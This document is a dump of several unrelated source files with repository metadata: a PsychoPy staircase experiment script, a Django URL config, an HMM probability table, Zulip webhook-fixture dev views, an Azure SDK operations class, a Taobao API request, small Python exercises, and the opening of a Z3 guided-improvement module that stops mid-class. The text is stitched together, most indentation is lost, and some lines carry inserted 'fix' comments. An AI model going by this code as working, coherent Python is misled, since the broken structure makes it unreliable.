stopInterval=1, # sd of posterior has to be this small or smaller for staircase to stop, unless nTrials reached
nTrials=staircaseTrials,
# extraInfo = thisInfo,
pThreshold=threshCriterion, # 0.25,
gamma=1./26,
delta=0.02, # lapse rate, I suppose for Weibull function fit
method='quantile', # uses the median of the posterior as the final answer
stepType='log', # will home in on the 80% threshold. But stepType = 'log' doesn't usually work
minVal=1, maxVal=100
)
print('created QUEST staircase')
else:
stepSizesLinear = [.2, .2, .1, .1, .05, .05]
stepSizesLog = [log(1.4, 10), log(1.4, 10), log(1.3, 10), log(1.3, 10), log(1.2, 10)]
staircase = data.StairHandler(startVal=0.1,
stepType='log', # if log, what do I want to multiply it by
stepSizes=stepSizesLog, # step size to use after each reversal
minVal=0, maxVal=1,
nUp=1, nDown=3, # will home in on the 80% threshold
                                      nReversals=2,  # the staircase terminates only once both nReversals and nTrials have been exceeded
nTrials=1)
print('created conventional staircase')
# repeat array to accommodate desired number of easyStarterTrials
if prefaceStaircaseTrialsN > len(prefaceStaircaseNoise):
prefaceStaircaseNoise = np.tile(prefaceStaircaseNoise, ceil(
prefaceStaircaseTrialsN/len(prefaceStaircaseNoise)))
prefaceStaircaseNoise = prefaceStaircaseNoise[0:prefaceStaircaseTrialsN]
    phasesMsg = ('Doing '+str(prefaceStaircaseTrialsN)+' trials with noisePercent= ' +
str(prefaceStaircaseNoise)+' then doing a max '+str(staircaseTrials)+'-trial staircase')
print(phasesMsg)
logging.info(phasesMsg)
# staircaseStarterNoise PHASE OF EXPERIMENT
corrEachTrial = list() # only needed for easyStaircaseStarterNoise
staircaseTrialN = -1
mainStaircaseGoing = False
while (not staircase.finished) and expStop == False: # staircase.thisTrialN < staircase.nTrials
if staircaseTrialN+1 < len(prefaceStaircaseNoise): # still doing easyStaircaseStarterNoise
staircaseTrialN += 1
noisePercent = prefaceStaircaseNoise[staircaseTrialN]
else:
# add these non-staircase trials so QUEST knows about them
if staircaseTrialN+1 == len(prefaceStaircaseNoise):
mainStaircaseGoing = True
print('Importing ', corrEachTrial, ' and intensities ', prefaceStaircaseNoise)
staircase.importData(100-prefaceStaircaseNoise, np.array(corrEachTrial))
printStaircase(staircase, descendingPsycho, briefTrialUpdate=False,
printInternalVal=True, alsoLog=False)
try: # advance the staircase
printStaircase(staircase, descendingPsycho, briefTrialUpdate=True,
printInternalVal=True, alsoLog=False)
# will step through the staircase, based on whether told it (addResponse) got it right or wrong
noisePercent = 100. - staircase.next()
staircaseTrialN += 1
except StopIteration: # Need this here, even though test for finished above. I can't understand why finished test doesn't accomplish this.
print(
'stopping because staircase.next() returned a StopIteration, which it does when it is finished')
break # break out of the trials loop
# print('staircaseTrialN=',staircaseTrialN)
        thisTrial = trialsForPossibleStaircase.next()  # assumed fix: draw a random trial so cue1pos, cueCoords and cue2lag are defined during the staircase phase; the original referenced undefined variables and omitted the spatialPos argument
        letterSequence, cuesPos, correctAnswers, resetCorrectAnswers, ts = do_RSVP_stim(
            thisTrial['cue1pos'], thisTrial['cueCoords'], thisTrial['cue2lag'], noisePercent/100., staircaseTrialN)
numCasesInterframeLong = timingCheckAndLog(ts, staircaseTrialN)
expStop, passThisTrial, responses, responsesAutopilot = \
stringResponse.collectStringResponse(numRespsWanted, respPromptStim, respStim, acceptTextStim, myWin, clickSound, badKeySound,
requireAcceptance, autopilot, responseDebug=True)
if not expStop:
if mainStaircaseGoing:
print('staircase\t', end='', file=dataFile)
else:
print('staircase_preface\t', end='', file=dataFile)
# header start 'trialnum\tsubject\ttask\t'
# first thing printed on each line of dataFile
print(staircaseTrialN, '\t', end='', file=dataFile)
print(subject, '\t', task, '\t', round(noisePercent, 2), '\t', end='', file=dataFile)
            correct, eachCorrect, eachApproxCorrect, T1approxCorrect, passThisTrial, expStop = (
                handleAndScoreResponse(passThisTrial, responses, responsesAutopilot, task, letterSequence, cuesPos, correctAnswers, thisTrial['cueCoords']))  # the spatialPos argument was missing from the original call
# print('Scored response. expStop=',expStop) #debug
# timingBlips, last thing recorded on each line of dataFile
print(numCasesInterframeLong, file=dataFile)
core.wait(.06)
if feedback:
play_high_tone_correct_low_incorrect(correct, passThisTrial=False)
print('staircaseTrialN=', staircaseTrialN, ' noisePercent=', round(
noisePercent, 3), ' T1approxCorrect=', T1approxCorrect) # debugON
corrEachTrial.append(T1approxCorrect)
if mainStaircaseGoing:
# Add a 1 or 0 to signify a correct/detected or incorrect/missed trial
staircase.addResponse(T1approxCorrect, intensity=100-noisePercent)
# print('Have added an intensity of','{:.3f}'.format(100-noisePercent), 'T1approxCorrect =', T1approxCorrect, ' to staircase') #debugON
# ENDING STAIRCASE PHASE
# exp stopped before got through staircase preface trials, so haven't imported yet
if staircaseTrialN+1 < len(prefaceStaircaseNoise) and (staircaseTrialN >= 0):
print('Importing ', corrEachTrial, ' and intensities ',
prefaceStaircaseNoise[0:staircaseTrialN+1])
        staircase.importData(100-prefaceStaircaseNoise[0:staircaseTrialN+1], np.array(corrEachTrial))  # slice must include trial staircaseTrialN to match the length of corrEachTrial
timeAndDateStr = time.strftime("%H:%M on %d %b %Y", time.localtime())
msg = ('prefaceStaircase phase' if expStop else '')
msg += ('ABORTED' if expStop else 'Finished') + \
' staircase part of experiment at ' + timeAndDateStr
logging.info(msg)
print(msg)
printStaircase(staircase, descendingPsycho, briefTrialUpdate=True,
printInternalVal=True, alsoLog=False)
# print('staircase.quantile=',round(staircase.quantile(),2),' sd=',round(staircase.sd(),2))
threshNoise = round(staircase.quantile(), 3)
if descendingPsycho:
threshNoise = 100 - threshNoise
    # e.g. if the subject gets all trials wrong, the posterior peaks at a very negative number
threshNoise = max(0, threshNoise)
msg = 'Staircase estimate of threshold = ' + \
str(threshNoise) + ' with sd=' + str(round(staircase.sd(), 2))
logging.info(msg)
print(msg)
myWin.close()
# Fit and plot data
fit = None
try:
intensityForCurveFitting = staircase.intensities
if descendingPsycho:
intensityForCurveFitting = 100-staircase.intensities # because fitWeibull assumes curve is ascending
fit = data.FitWeibull(intensityForCurveFitting, staircase.data,
expectedMin=1/26., sems=1.0/len(staircase.intensities))
    except Exception:
print("Fit failed.")
plotDataAndPsychometricCurve(staircase, fit, descendingPsycho, threshCriterion)
# save figure to file
pylab.savefig(fileName+'.pdf')
print('The plot has been saved, as '+fileName+'.pdf')
pylab.show() # must call this to actually show plot
else: # not staircase
noisePercent = defaultNoiseLevel
    phasesMsg = 'Experiment will have ' + \
        str(trials.nTotal)+' trials. Letters will be drawn with superposed noise of ' + \
        str(defaultNoiseLevel) + '%'  # defaultNoiseLevel is a whole-number percentage, so {:.2%} (which multiplies by 100) was wrong here
print(phasesMsg)
logging.info(phasesMsg)
# myWin= openMyStimWindow(); myWin.flip(); myWin.flip();myWin.flip();myWin.flip()
nDoneMain = 0
while nDoneMain < trials.nTotal and expStop == False:
if nDoneMain == 0:
msg = 'Starting main (non-staircase) part of experiment'
logging.info(msg)
print(msg)
thisTrial = trials.next() # get a proper (non-staircase) trial
cue1pos = thisTrial['cue1pos']
cue2lag = None
spatialPos = thisTrial['cueCoords']
if task == "T1T2":
cue2lag = thisTrial['cue2lag']
letterSequence, cuesPos, correctAnswers, resetCorrectAnswers, ts = do_RSVP_stim(
cue1pos, spatialPos, cue2lag, noisePercent/100., nDoneMain)
numCasesInterframeLong = timingCheckAndLog(ts, nDoneMain)
responseDebug = False
responses = list()
responsesAutopilot = list()
expStop, passThisTrial, responses, responsesAutopilot = \
stringResponse.collectStringResponse(numRespsWanted, respPromptStim, respStim, acceptTextStim, myWin, clickSound, badKeySound,
requireAcceptance, autopilot, responseDebug=True)
# tempResp = list(letterSequence)
# correctIndex1 = tempResp.index(correctAnswers[0])
# correctIndex2 = tempResp.index(correctAnswers[1])
# respIndex1 = tempResp.index(letterToNumber(responses[0]))
# respIndex2 = tempResp.index(letterToNumber(responses[1]))
# diffIndex1 = correctIndex1 - respIndex1
# diffIndex2 = correctIndex2 - respIndex2
#
# print(cue2lag)
        correctResponseStim = visual.TextStim(
            myWin, text="The correct answer is : " + ", ".join(str(a) for a in correctAnswers))  # join copes with one target (T1) as well as two (T1T2)
event.waitKeys()
while not event.getKeys():
correctResponseStim.draw()
myWin.flip()
print('responses=', responses)
print('expStop=', expStop, ' passThisTrial=', passThisTrial, ' responses=',
responses, ' responsesAutopilot =', responsesAutopilot)
if not expStop:
# first thing printed on each line of dataFile
print('main\t', end='', file=dataFile)
print(nDoneMain, '\t', end='', file=dataFile)
print(subject, '\t', task, '\t', round(noisePercent, 3), '\t', end='', file=dataFile)
correct, eachCorrect, eachApproxCorrect, T1approxCorrect, passThisTrial, expStop = (
handleAndScoreResponse(passThisTrial, responses, responsesAutopilot, task, letterSequence, cuesPos, correctAnswers, spatialPos))
# timingBlips, last thing recorded on each line of dataFile
print(numCasesInterframeLong, file=dataFile)
numTrialsCorrect += correct # so count -1 as 0
numTrialsApproxCorrect += eachApproxCorrect.all()
numTrialsEachCorrect += eachCorrect
numTrialsEachApproxCorrect += eachApproxCorrect
if task == "T1T2":
cue2lagIdx = list(possibleCue2lags).index(cue2lag)
nTrialsCorrectT2eachLag[cue2lagIdx] += eachCorrect[1]
nTrialsApproxCorrectT2eachLag[cue2lagIdx] += eachApproxCorrect[1]
nTrialsEachLag[cue2lagIdx] += 1
if exportImages: # catches one frame of response
            myWin.getMovieFrame()  # I can't explain why another getMovieFrame, and core.wait is needed
framesSaved += 1
core.wait(.1)
myWin.saveMovieFrames('exported/frames.mov')
expStop = True
core.wait(.1)
if feedback:
play_high_tone_correct_low_incorrect(correct, passThisTrial=False)
nDoneMain += 1
dataFile.flush()
logging.flush()
print('nDoneMain=', nDoneMain, ' trials.nTotal=',
trials.nTotal) # ' trials.thisN=',trials.thisN
        if (trials.nTotal > 6 and nDoneMain > 2 and nDoneMain %
                (trials.nTotal*pctCompletedBreak/100.) == 1):  # don't compare the modulus to 0, because then the break would fire on the last trial
nextText.setText('Press "SPACE" to continue!')
nextText.draw()
progressMsg = 'Completed ' + str(nDoneMain) + \
' of ' + str(trials.nTotal) + ' trials'
NextRemindCountText.setText(progressMsg)
NextRemindCountText.draw()
myWin.flip() # myWin.flip(clearBuffer=True)
waiting = True
while waiting:
if autopilot:
break
elif expStop == True:
break
for key in event.getKeys(): # check if pressed abort-type key
if key in ['space', 'ESCAPE']:
waiting = False
if key in ['ESCAPE']:
                        expStop = True  # ESCAPE aborts the experiment; the original assigned False, which had no effect
myWin.clearBuffer()
core.wait(.2)
time.sleep(.2)
# end main trials loop
timeAndDateStr = time.strftime("%H:%M on %d %b %Y", time.localtime())
msg = 'Finishing at '+timeAndDateStr
print(msg)
logging.info(msg)
if expStop:
msg = 'user aborted experiment on keypress with trials done=' + \
str(nDoneMain) + ' of ' + str(trials.nTotal+1)
print(msg)
logging.error(msg)
if not doStaircase and (nDoneMain > 0):
print('Of ', nDoneMain, ' trials, on ', numTrialsCorrect*1.0/nDoneMain*100., '% of all trials all targets reported exactly correct', sep='')
print('All targets approximately correct in ', round(numTrialsApproxCorrect*1.0/nDoneMain*100, 1), '% of trials', sep='')
print('T1: ', round(numTrialsEachCorrect[0]*1.0/nDoneMain*100., 2), '% correct', sep='')
if len(numTrialsEachCorrect) > 1:
print('T2: ', round(numTrialsEachCorrect[1]*1.0/nDoneMain*100, 2), '% correct', sep='')
print('T1: ', round(numTrialsEachApproxCorrect[0]*1.0/nDoneMain*100, 2), '% approximately correct', sep='')
if len(numTrialsEachCorrect) > 1:
print('T2: ', round(numTrialsEachApproxCorrect[1]*1.0/nDoneMain*100, 2), '% approximately correct', sep='')
    print('T2 for each of the lags,', np.around(possibleCue2lags, 0), ': ', np.around(100*nTrialsCorrectT2eachLag / nTrialsEachLag, 3), '% correct, and ',
          np.around(100*nTrialsApproxCorrectT2eachLag/nTrialsEachLag, 3), '% approximately correct')
# print numRightWrongEachSpeedOrder[:,1] / ( numRightWrongEachSpeedOrder[:,0] + numRightWrongEachSpeedOrder[:,1])
logging.flush()
dataFile.close()
myWin.close() # have to close window if want to show a plot
# ADD PLOT OF AB PERFORMANCE?
| [
"[email protected]"
] | |
689cb975bfecd8db5e093abf10d4ce088eda3841 | 77c2010bb9533ecbdfa46cd41c16ee5ae26e94fa | /blog/urls.py | f47fe3383b5e4c15a25bebd8f057c5476da21240 | [] | no_license | dimansion/portfolio-django | b2cbb28dff97dd03cdf795f0bc661d39bcfae83d | 2dffe0e8579b2a426cb7aceb1ee085933b122d90 | refs/heads/master | 2020-05-23T08:15:38.205372 | 2017-03-05T14:44:14 | 2017-03-05T14:44:14 | 70,251,368 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from django.conf.urls import url
from django.contrib import admin
from .views import (
post_list,
post_create,
post_detail,
post_update,
post_delete,
)
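# CRUD routes for blog posts; detail, update and delete look a post up by its slug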
urlpatterns = [
url(r'^$', post_list, name='list'),
url(r'^create/$', post_create),
url(r'^(?P<slug>[\w-]+)/$', post_detail, name='detail'),
url(r'^(?P<slug>[\w-]+)/edit/$', post_update, name='update'),
url(r'^(?P<slug>[\w-]+)/delete/$', post_delete),
#url(r'^<posts></posts>/$', "<appname>.views.<function_name>"),
] | [
"[email protected]"
] | |
952a83fef5c7290c002d8325d0d09c4de2fc2f89 | 94d5467b1315791fa75165eb862fdd8fef300958 | /yunyan_baotou/src/user_prob/bak/prob_trans.py | 5c962bdbf3d75cd901bff55b83083745fea7fde2 | [] | no_license | scmsqhn/code | e31926174c247d49c1db8f121e3ec1b82f8a2d9d | b389d7dc5fafad8a4185a03cd6d5519ccf8f99df | refs/heads/master | 2022-12-09T05:37:07.065840 | 2019-05-14T01:55:07 | 2019-05-14T01:55:07 | 185,903,771 | 1 | 0 | null | 2022-12-08T05:05:51 | 2019-05-10T02:22:28 | Python | UTF-8 | Python | false | false | 448 | py | #P={'B': {'E': -0.510825623765990, 'M': -0.916290731874155},
# 'E': {'B': -0.5897149736854513, 'S': -0.8085250474669937},
# 'M': {'E': -0.33344856811948514, 'M': -1.2603623820268226},
# 'S': {'B': -0.7211965654669841, 'S': -0.6658631448798212}}
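# Transition log-probabilities for a B/M/E/S hidden Markov model used in word
# segmentation: B = begin of a multi-character word, M = middle, E = end,
# S = single-character word. -1e+10 approximates log(0), i.e. a transition this
# model treats as effectively impossible.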
P={'B': {'E': -3.2770032528476309, 'M': -1.030296703073057},
'E': {'B': -3.2770032528476309 , 'S': -1e+10},
'M': {'E': -1.030296703073057, 'M': -1.3924866568570602},
'S': {'B': -1e+10, 'S': -1e+10}}
| [
"[email protected]"
] | |
d923053a034a799be752fd757cda0a0a54a7f8e4 | b3c3b09a2abc71b35fc54da16f2b4d88b254fc4b | /zerver/views/development/integrations.py | fba4308be9525cf13491593a658ca06e12e346b9 | [
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] | permissive | yovanycunha/zulip | 2fc57ba2f35736d13b609f763e1b36f6686c4a80 | 339f742578c15cc9c72d44963e621986629818bb | refs/heads/master | 2020-09-03T04:12:41.356314 | 2019-11-03T22:02:37 | 2019-11-03T23:51:19 | 219,382,296 | 1 | 0 | Apache-2.0 | 2019-11-03T23:51:44 | 2019-11-03T23:51:44 | null | UTF-8 | Python | false | false | 5,681 | py | import os
import ujson
from typing import Any, Dict, List
from django.http import HttpRequest, HttpResponse
from django.shortcuts import render
from django.test import Client
from zerver.lib.integrations import WEBHOOK_INTEGRATIONS
from zerver.lib.request import has_request_variables, REQ
from zerver.lib.response import json_success, json_error
from zerver.models import UserProfile, get_realm
from zerver.lib.webhooks.common import get_fixture_http_headers, \
standardize_headers
ZULIP_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../')
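# Development-only views: a panel listing incoming-webhook integrations plus
# endpoints that replay recorded fixture payloads (bodies and headers) against
# a chosen webhook URL.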
def get_webhook_integrations() -> List[str]:
return [integration.name for integration in WEBHOOK_INTEGRATIONS]
def dev_panel(request: HttpRequest) -> HttpResponse:
integrations = get_webhook_integrations()
bots = UserProfile.objects.filter(is_bot=True, bot_type=UserProfile.INCOMING_WEBHOOK_BOT)
context = {"integrations": integrations, "bots": bots}
return render(request, "zerver/integrations/development/dev_panel.html", context)
def send_webhook_fixture_message(url: str=REQ(),
body: str=REQ(),
is_json: bool=REQ(),
custom_headers: Dict[str, Any]=REQ()) -> HttpResponse:
client = Client()
realm = get_realm("zulip")
standardized_headers = standardize_headers(custom_headers)
http_host = standardized_headers.pop("HTTP_HOST", realm.host)
if is_json:
content_type = standardized_headers.pop("HTTP_CONTENT_TYPE", "application/json")
else:
content_type = standardized_headers.pop("HTTP_CONTENT_TYPE", "text/plain")
return client.post(url, body, content_type=content_type, HTTP_HOST=http_host,
**standardized_headers)
@has_request_variables
def get_fixtures(request: HttpResponse,
integration_name: str=REQ()) -> HttpResponse:
integrations = get_webhook_integrations()
if integration_name not in integrations:
return json_error("\"{integration_name}\" is not a valid webhook integration.".format(
integration_name=integration_name), status=404)
fixtures = {}
fixtures_dir = os.path.join(ZULIP_PATH, "zerver/webhooks/{integration_name}/fixtures".format(
integration_name=integration_name))
if not os.path.exists(fixtures_dir):
msg = ("The integration \"{integration_name}\" does not have fixtures.").format(
integration_name=integration_name)
return json_error(msg, status=404)
for fixture in os.listdir(fixtures_dir):
fixture_path = os.path.join(fixtures_dir, fixture)
with open(fixture_path, 'r') as f:
body = f.read()
try:
body = ujson.loads(body)
except ValueError:
pass # The file extension will be used to determine the type.
headers_raw = get_fixture_http_headers(integration_name,
"".join(fixture.split(".")[:-1]))
headers = {}
for header in headers_raw:
if header.startswith("HTTP_"): # HTTP_ is a prefix intended for Django.
                headers[header[len("HTTP_"):]] = headers_raw[header]  # slice off the prefix; lstrip("HTTP_") strips a character set and would mangle names like HTTP_HOST
else:
headers[header] = headers_raw[header]
fixtures[fixture] = {"body": body, "headers": headers}
return json_success({"fixtures": fixtures})
@has_request_variables
def check_send_webhook_fixture_message(request: HttpRequest,
url: str=REQ(),
body: str=REQ(),
is_json: bool=REQ(),
custom_headers: str=REQ()) -> HttpResponse:
try:
custom_headers_dict = ujson.loads(custom_headers)
except ValueError as ve:
return json_error("Custom HTTP headers are not in a valid JSON format. {}".format(ve)) # nolint
response = send_webhook_fixture_message(url, body, is_json,
custom_headers_dict)
if response.status_code == 200:
responses = [{"status_code": response.status_code,
"message": response.content}]
return json_success({"responses": responses})
else:
return response
@has_request_variables
def send_all_webhook_fixture_messages(request: HttpRequest,
url: str=REQ(),
integration_name: str=REQ()) -> HttpResponse:
fixtures_dir = os.path.join(ZULIP_PATH, "zerver/webhooks/{integration_name}/fixtures".format(
integration_name=integration_name))
if not os.path.exists(fixtures_dir):
msg = ("The integration \"{integration_name}\" does not have fixtures.").format(
integration_name=integration_name)
return json_error(msg, status=404)
responses = []
for fixture in os.listdir(fixtures_dir):
fixture_path = os.path.join(fixtures_dir, fixture)
with open(fixture_path, 'r') as f:
content = f.read()
x = fixture.split(".")
fixture_name, fixture_format = "".join(_ for _ in x[:-1]), x[-1]
headers = get_fixture_http_headers(integration_name, fixture_name)
        is_json = fixture_format == "json"
response = send_webhook_fixture_message(url, content, is_json, headers)
responses.append({"status_code": response.status_code,
"fixture_name": fixture,
"message": response.content})
return json_success({"responses": responses})
| [
"[email protected]"
] | |
45d3ae300ef4fa451f0e6b75cff19ba93f979adc | aa0270b351402e421631ebc8b51e528448302fab | /sdk/recoveryservices/azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/activestamp/operations/_protection_policy_operation_results_operations.py | 58b5481810d826165bfeac369e00feb3a9394861 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 7,201 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import sys
from typing import Any, Callable, Dict, Optional, TypeVar
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from .._serialization import Serializer
from .._vendor import RecoveryServicesBackupClientMixinABC, _convert_request, _format_url_section
if sys.version_info >= (3, 8):
from typing import Literal # pylint: disable=no-name-in-module, ungrouped-imports
else:
from typing_extensions import Literal # type: ignore # pylint: disable=ungrouped-imports
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_get_request(
vault_name: str, resource_group_name: str, policy_name: str, operation_id: str, subscription_id: str, **kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop("api_version", _params.pop("api-version", "2023-02-01"))
accept = _headers.pop("Accept", "application/json")
# Construct URL
_url = kwargs.pop(
"template_url",
"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupPolicies/{policyName}/operationResults/{operationId}",
) # pylint: disable=line-too-long
path_format_arguments = {
"vaultName": _SERIALIZER.url("vault_name", vault_name, "str"),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, "str"),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, "str"),
"policyName": _SERIALIZER.url("policy_name", policy_name, "str"),
"operationId": _SERIALIZER.url("operation_id", operation_id, "str"),
}
_url: str = _format_url_section(_url, **path_format_arguments) # type: ignore
# Construct parameters
_params["api-version"] = _SERIALIZER.query("api_version", api_version, "str")
# Construct headers
_headers["Accept"] = _SERIALIZER.header("accept", accept, "str")
return HttpRequest(method="GET", url=_url, params=_params, headers=_headers, **kwargs)
class ProtectionPolicyOperationResultsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.recoveryservicesbackup.activestamp.RecoveryServicesBackupClient`'s
:attr:`protection_policy_operation_results` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def get(
self, vault_name: str, resource_group_name: str, policy_name: str, operation_id: str, **kwargs: Any
) -> _models.ProtectionPolicyResource:
"""Provides the result of an operation.
:param vault_name: The name of the recovery services vault. Required.
:type vault_name: str
:param resource_group_name: The name of the resource group where the recovery services vault is
present. Required.
:type resource_group_name: str
:param policy_name: Backup policy name whose operation's result needs to be fetched. Required.
:type policy_name: str
:param operation_id: Operation ID which represents the operation whose result needs to be
fetched. Required.
:type operation_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProtectionPolicyResource or the result of cls(response)
:rtype: ~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionPolicyResource
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2023-02-01"] = kwargs.pop(
"api_version", _params.pop("api-version", self._config.api_version)
)
cls: ClsType[_models.ProtectionPolicyResource] = kwargs.pop("cls", None)
request = build_get_request(
vault_name=vault_name,
resource_group_name=resource_group_name,
policy_name=policy_name,
operation_id=operation_id,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.get.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
_stream = False
pipeline_response: PipelineResponse = self._client._pipeline.run( # pylint: disable=protected-access
request, stream=_stream, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("ProtectionPolicyResource", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupPolicies/{policyName}/operationResults/{operationId}"
}
| [
"[email protected]"
] | |
5ac37bff1e1c67144707a66c27ca55b95a253605 | e1b8fb9a5500516f28d3d7e9a5f259c49ef35f14 | /top/api/rest/ItempropvaluesGetRequest.py | 1641824f67bf20947dfd5c1e6d7cc49197575d1e | [] | no_license | htom78/taobao_comet_py | 9224dbca1a413a54bcc5569873e4c7a9fc9ba059 | ad8b2e983a14d3ab7665244449f79dd72f390815 | refs/heads/master | 2020-05-17T10:47:28.369191 | 2013-08-27T08:50:59 | 2013-08-27T08:50:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | '''
Created by auto_sdk on 2013-06-16 16:36:02
'''
from top.api.base import RestApi
class ItempropvaluesGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
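    # Parameters of the TOP API call; the caller populates these before executing
    # the request (which of them are required is defined by the
    # taobao.itempropvalues.get API itself, not checked here).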
self.cid = None
self.fields = None
self.pvs = None
self.type = None
def getapiname(self):
return 'taobao.itempropvalues.get'
| [
"[email protected]"
] | |
ef5540685a093ff38d640fd18b6e7e5528ee2196 | 8292648c36f4b1e8eb70c0992eec3737dc7d7749 | /exam_practice/Samples/Sample 6/sample_6.py | fb8d6c663edd847d65fb057da8c8f45486bd82f2 | [] | no_license | LukeElliman/Sandbox | 6f4dc2b57db4475dab376fa4de8ec7b3a0cd238e | 519ab171c121ca7f7dc22c484836314b816033be | refs/heads/master | 2023-05-24T06:53:57.638685 | 2021-06-05T12:57:12 | 2021-06-05T12:57:12 | 344,040,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 235 | py | def count_words(sentence):
"""Count words in sentence"""
words = sentence.split(" ")
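    # note: split(" ") yields empty strings for consecutive spaces, inflating the
    # count; split() with no argument would be more robust for word counting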
return len(words)
print(count_words("This is a sentence with words in it"))
print(count_words(("Hello, my name is Luke, whats your's?"))) | [
"[email protected]"
] | |
e384b0b89ef2675764b8f90db90e2618a131954f | 0e3d0ac18a0605c26ac004c6da904d06d1f93ad0 | /decorators_exercise/execution_time.py | 1c81a3a6fb46897c9dd2a914709b3568ab0a67a0 | [] | no_license | lion963/Python-OOP | a74c85918bf7400dc5ffc82ff4c02b699969b1b1 | 24d184030f6cac8288d27a17cecb64bd133c1cf6 | refs/heads/main | 2023-04-06T05:48:53.945037 | 2021-04-15T07:28:35 | 2021-04-15T07:28:35 | 333,083,111 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 493 | py | import time
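# Timing decorator: the wrapper calls the decorated function but deliberately
# returns the elapsed time in seconds instead of the function's own result.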
def exec_time(func):
    def wrapper(*args, **kwargs):
        start_time = time.time()
        func(*args, **kwargs)
        return time.time() - start_time
return wrapper
@exec_time
def loop(start, end):
total = 0
for x in range(start, end):
total += x
return total
print(loop(1, 10000000))
@exec_time
def concatenate(strings):
result = ""
for string in strings:
result += string
return result
print(concatenate(["a" for i in range(1000000)]))
| [
"[email protected]"
] | |
c62b5ee746ccfce616744d13ae9e9517ab93fae9 | a8079efec61894fb6082986e66c4c146757fc895 | /src/gia/npGIAforZ3.py | d215c013d3ac83180938d3cafbd33092e4b60d34 | [] | no_license | gsdlab/ClaferSMT | aaa5bd0c0c72f6a9b156529a871cced40e006cba | d8240b4503107641d62f7f913ebe50a88182d9a3 | refs/heads/master | 2021-01-16T21:23:22.838308 | 2015-08-20T00:24:54 | 2015-08-20T00:24:54 | 9,037,961 | 2 | 1 | null | 2018-08-21T13:48:02 | 2013-03-26T19:00:12 | TeX | UTF-8 | Python | false | false | 13,428 | py |
from common import Common, SMTLib
from common.Common import preventSameModel
from time import time
from solvers import BaseSolver
#Modified by Jianmei for EPOAL
# count #ParetoPoints
# count #satcalls and #unsatcalls
# print every found Pareto point (especially for Eshop)
OUTPUT_PARETO_FRONT = False
RECORDPOINT = False
def setRecordPoint(b):
global RECORDPOINT
RECORDPOINT = b
class GuidedImprovementAlgorithmOptions(object):
def __init__(self, verbosity=False, useSummaryStatsFile=False, \
SummaryStatsFilename="", incrementallyWriteLog=False, \
writeLogFilename="", writeTotalTimeFilename="timefile.csv", \
writeRandomSeedsFilename="randomseed.csv", \
exclude_variables_in_printout=[],\
incrementallyprintparetopoints=False,
useCallLogs=False, num_models=-1, magnifying_glass=False):
self.verbosity = verbosity
self.useSummaryStatsFile = useSummaryStatsFile
self.SummaryStatsFilename = SummaryStatsFilename
self.exclude_variables_in_printout = exclude_variables_in_printout
self.incrementallyWriteLog = incrementallyWriteLog
self.writeLogFilename = writeLogFilename
